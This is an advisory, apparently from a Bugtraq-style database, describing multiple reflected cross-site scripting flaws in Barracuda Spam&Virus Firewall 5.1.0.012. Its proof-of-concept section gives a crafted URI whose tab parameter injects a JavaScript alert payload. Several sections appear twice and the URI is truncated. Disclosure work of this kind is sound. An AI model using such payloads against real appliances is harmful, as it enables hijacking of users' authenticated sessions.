Barracuda Networks Spam&Virus Firewall Multiple Cross Site Scripting Vulnerabilities
BID:68808
Info
Barracuda Networks Spam&Virus Firewall Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 68808 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 22 2014 12:00AM |
| Updated: | Mar 19 2015 09:36AM |
| Credit: | Ebrahim Hegazy |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Barracuda Networks Spam&Virus Firewall Multiple Cross Site Scripting Vulnerabilities
Barracuda Networks Spam&Virus Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Spam&Virus Firewall 5.1.0.012 is vulnerable; other versions may also be affected.
Barracuda Networks Spam&Virus Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Spam&Virus Firewall 5.1.0.012 is vulnerable; other versions may also be affected.
Exploit / POC
Barracuda Networks Spam&Virus Firewall Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URI is available:
http:// www.example.com/cgi-mod/index.cgi?primary_tab=1%27-alert%28document.location%29-%27//&secondary_tab=quarantine_setup&realm= %0D&auth_type=Local&user=guest&password=0dc15354daf5236353adf547cf675a49&et=1361818196&role=%0D&locale=en_US&q= %0D&UPDATE_scana_per_user=Yes&save=Save+Changes&UPDATE_scana_quarantine_addr=fdhdf&UPDATE_scana_quarantine_tag=[QUAR] &UPDATE_scana_quarantine_reply_addr=postmaster () barracudanetworks com&UPDATE_quarantine_inbox_url= %0D&UPDATE_quarantine_enable_default=No&UPDATE_scana_use_default_domain=No&UPDATE_scana_quarantine_notify=Daily&UPDATE_notification_time=15%3 a35&UPDATE_outbound_dusage_use_size_limit=No&UPDATE_outbound_dusage_size_limit=1024000&UPDATE_outbound_dusage_use_age_limit=Yes&UPDATE_outbou nd_dusage_age_limit=30&UPDATE_user_quarantine_notify=Never&UPDATE_outbound_notification_time=15%3a35&UPDATE_user_quarantine_email_address=%0
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URI is available:
http:// www.example.com/cgi-mod/index.cgi?primary_tab=1%27-alert%28document.location%29-%27//&secondary_tab=quarantine_setup&realm= %0D&auth_type=Local&user=guest&password=0dc15354daf5236353adf547cf675a49&et=1361818196&role=%0D&locale=en_US&q= %0D&UPDATE_scana_per_user=Yes&save=Save+Changes&UPDATE_scana_quarantine_addr=fdhdf&UPDATE_scana_quarantine_tag=[QUAR] &UPDATE_scana_quarantine_reply_addr=postmaster () barracudanetworks com&UPDATE_quarantine_inbox_url= %0D&UPDATE_quarantine_enable_default=No&UPDATE_scana_use_default_domain=No&UPDATE_scana_quarantine_notify=Daily&UPDATE_notification_time=15%3 a35&UPDATE_outbound_dusage_use_size_limit=No&UPDATE_outbound_dusage_size_limit=1024000&UPDATE_outbound_dusage_use_age_limit=Yes&UPDATE_outbou nd_dusage_age_limit=30&UPDATE_user_quarantine_notify=Never&UPDATE_outbound_notification_time=15%3a35&UPDATE_user_quarantine_email_address=%0
Solution / Fix
Barracuda Networks Spam&Virus Firewall Multiple Cross Site Scripting Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Barracuda Networks Spam&Virus Firewall Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Product Homepage (Barracuda Networks)